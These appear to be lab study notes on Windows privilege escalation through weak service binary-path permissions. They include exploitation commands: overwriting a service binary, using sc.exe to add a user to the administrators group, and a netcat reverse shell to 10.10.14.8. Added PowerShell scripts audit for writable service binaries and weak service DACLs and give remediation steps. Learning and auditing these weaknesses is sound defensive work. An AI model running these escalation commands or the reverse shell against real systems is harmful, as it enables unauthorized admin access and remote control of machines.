# Binary Paths

## Overview

Every Windows service runs an executable from a configured **binary path**. If we have the right permissions on the service (or on the executable itself), we can change the binary path to point at a malicious executable, or overwrite the existing one, and it will run under the service's account the next time the service starts.

## Exploitation via PowerShell

View running services and their binary paths

```powershell
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
```

View permissions on a service binary

```powershell
icacls "C:\xampp\apache\bin\mysqld.exe"
```

| Mask | Permissions             |
|------|-------------------------|
| F    | Full access             |
| M    | Modify access           |
| RX   | Read and execute access |
| R    | Read-only access        |
| W    | Write-only access       |
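Checking one binary at a time with `icacls` does not scale. The following script is an added defensive check, not part of the original notes: it walks every running service, extracts the executable from `PathName` (quoted, unquoted, with or without arguments), and reports any file or parent directory where a low-privileged principal holds a write-type right (the icacls `W`, `M` or `F` masks). The list of low-privileged principals is an assumption; extend it for your environment.

```powershell
# Added example (not from the original notes): audit the executables behind
# running services and report any that a low-privileged principal can write
# to or replace. Run from an elevated prompt so every ACL is readable.

# Principals that should never be able to modify a service binary.
# This list is an assumption; add groups that are unprivileged in your estate.
$WeakPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let a principal overwrite, replace or delete the binary.
# WriteData corresponds to the icacls "W" mask, Modify to "M", FullControl to "F".
$WriteMask = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [System.Security.AccessControl.FileSystemRights]::Delete -bor
             [System.Security.AccessControl.FileSystemRights]::Modify -bor
             [System.Security.AccessControl.FileSystemRights]::FullControl

function Get-ServiceExecutablePath {
    # PathName may be quoted, unquoted, and carry arguments; keep only the
    # executable. Unquoted paths are cut at the first ".exe".
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $PathName.Split(' ')[0]
}

function Get-WeakAces {
    # Returns the Allow ACEs on $Path that grant a weak principal write rights.
    param([string]$Path)
    $acl = Get-Acl -LiteralPath $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$WriteMask) -eq 0) { continue }
        $ace
    }
}

function Find-WritableServiceBinaries {
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.State -eq 'Running' } |
        ForEach-Object {
            $svc = $_
            $exe = Get-ServiceExecutablePath $svc.PathName
            if (-not $exe -or -not (Test-Path -LiteralPath $exe)) { return }
            # Check the file itself and its directory: write access to the
            # directory is enough to rename the binary and drop a new one.
            foreach ($target in @($exe, (Split-Path -Parent $exe))) {
                foreach ($ace in (Get-WeakAces -Path $target)) {
                    [pscustomobject]@{
                        Service   = $svc.Name
                        RunsAs    = $svc.StartName
                        Target    = $target
                        Principal = $ace.IdentityReference.Value
                        Rights    = $ace.FileSystemRights
                    }
                }
            }
        }
}

Find-WritableServiceBinaries | Format-Table -AutoSize
```

Any row in the output is a finding: a service running as `LocalSystem` whose binary or directory is writable by `BUILTIN\Users` is exactly the condition the notes above exploit. The fix is to remove the offending ACE with `icacls <path> /remove:g <principal>` (or restore inheritance from a correctly secured parent) and to keep service binaries out of user-writable locations such as `C:\temp`.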

Check the service start mode, replace the service binary with a malicious one, then restart the service (if the service starts automatically but cannot be restarted, reboot instead)

```powershell
# Check how the service starts (Auto or Manual) before touching it
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
# After replacing mysqld.exe, restart the service so the new binary runs
net stop mysql
net start mysql
# If the service cannot be restarted but is set to Auto, reboot to trigger it
shutdown /r /t 0
```

## Exploitation using PowerUp

#### Run PowerUp on the machine

```powershell
. .\PowerUp.ps1
Invoke-AllChecks
```

![TCM Windows Priv Esc on Try Hack Me](/files/9OyK3ubE3rgWjbQHj4qQ)

#### Change the binary path

```powershell
# Either add the current user to the local administrators group ...
sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"
# ... or point the service at a reverse shell (pick one)
sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337"
```

#### Start service

```powershell
sc.exe start daclsvc
```

## Exploitation via Accesschk64

#### Check for services with write permissions

```powershell
# -accepteula suppresses the licence prompt; -u suppresses errors, -w lists
# objects with write access, -c treats the names as services, -v is verbose
accesschk64.exe -accepteula -uwcv Everyone *
```

![TCM Windows Priv Esc on Try Hack Me](/files/Zj5d3eQv0PFDyZn25C46)

```powershell
accesschk64.exe -uwcv daclsvc
```

![TCM Windows Priv Esc on Try Hack Me](/files/Azm098szRD9lItKXsNra)

#### Query the service

```powershell
# Use sc.exe explicitly: in PowerShell, "sc" alone is an alias for Set-Content
sc.exe qc daclsvc
```

![TCM Windows Priv Esc on Try Hack Me](/files/I7VhqgAYTcqeIH4PRRr7)

Changing the binary path and starting the service are the same as in the PowerUp method above.

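What PowerUp and `accesschk64 -uwcv` are reporting is the service object's own DACL. The script below is an added audit example, not part of the original notes or of either tool: it reads each service's security descriptor with `sc.exe sdshow`, parses the SDDL with the .NET `RawSecurityDescriptor` class, and flags any Allow ACE that grants `SERVICE_CHANGE_CONFIG`, `WRITE_DAC`, `WRITE_OWNER` or a generic write/all right to a principal outside a trusted allow-list. The allow-list is an assumption; the access-mask constants are the documented Win32 service and standard rights.

```powershell
# Added example (not from the original notes): find services whose DACL lets
# a non-administrator reconfigure them (the condition accesschk64 -uwcv and
# PowerUp's service checks report). Run elevated for complete results.

# Service-specific and standard access bits (Win32 service security docs).
$SERVICE_CHANGE_CONFIG = 0x00000002
$SERVICE_START         = 0x00000010
$SERVICE_STOP          = 0x00000020
$WRITE_DAC             = 0x00040000
$WRITE_OWNER           = 0x00080000
$GENERIC_ALL           = 0x10000000
$GENERIC_WRITE         = 0x40000000
$DangerousMask = $SERVICE_CHANGE_CONFIG -bor $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL -bor $GENERIC_WRITE

# Principals that may legitimately reconfigure services. This allow-list is an
# assumption; anything not listed here gets reported.
$TrustedSids = @(
    'S-1-5-18',       # NT AUTHORITY\SYSTEM
    'S-1-5-32-544',   # BUILTIN\Administrators
    'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'  # TrustedInstaller
)

function Get-ServiceDaclFindings {
    param([string[]]$ServiceName = (Get-Service | Select-Object -ExpandProperty Name))
    foreach ($name in $ServiceName) {
        # sdshow prints a blank line, then the SDDL; errors go to stdout as "[SC] ..."
        $sddl = (sc.exe sdshow $name 2>$null | Where-Object { $_ -match '^D:' }) -join ''
        if (-not $sddl) { continue }
        try   { $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl) }
        catch { continue }
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace -isnot [System.Security.AccessControl.KnownAce]) { continue }
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            if (($ace.AccessMask -band $DangerousMask) -eq 0) { continue }
            $sid = $ace.SecurityIdentifier.Value
            if ($TrustedSids -contains $sid) { continue }
            try   { $account = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
            catch { $account = $sid }
            [pscustomobject]@{
                Service      = $name
                Principal    = $account
                ChangeConfig = [bool]($ace.AccessMask -band $SERVICE_CHANGE_CONFIG)
                StartStop    = [bool]($ace.AccessMask -band ($SERVICE_START -bor $SERVICE_STOP))
                WriteDacl    = [bool]($ace.AccessMask -band ($WRITE_DAC -bor $WRITE_OWNER))
                GenericWrite = [bool]($ace.AccessMask -band ($GENERIC_ALL -bor $GENERIC_WRITE))
                AccessMask   = ('0x{0:X8}' -f $ace.AccessMask)
            }
        }
    }
}

# Usage: audit everything, or a single service such as the one in the notes above.
Get-ServiceDaclFindings | Format-Table -AutoSize
Get-ServiceDaclFindings -ServiceName daclsvc | Format-Table -AutoSize
```

A row with `ChangeConfig = True` for `Everyone` or `BUILTIN\Users` means the `sc.exe config ... binpath=` step above would succeed for any local user; `WriteDacl = True` is worse, because the principal can grant itself whatever is missing. Remediate by rewriting the descriptor with `sc.exe sdset <service> <sddl>` without the offending ACE, and re-run the audit to confirm.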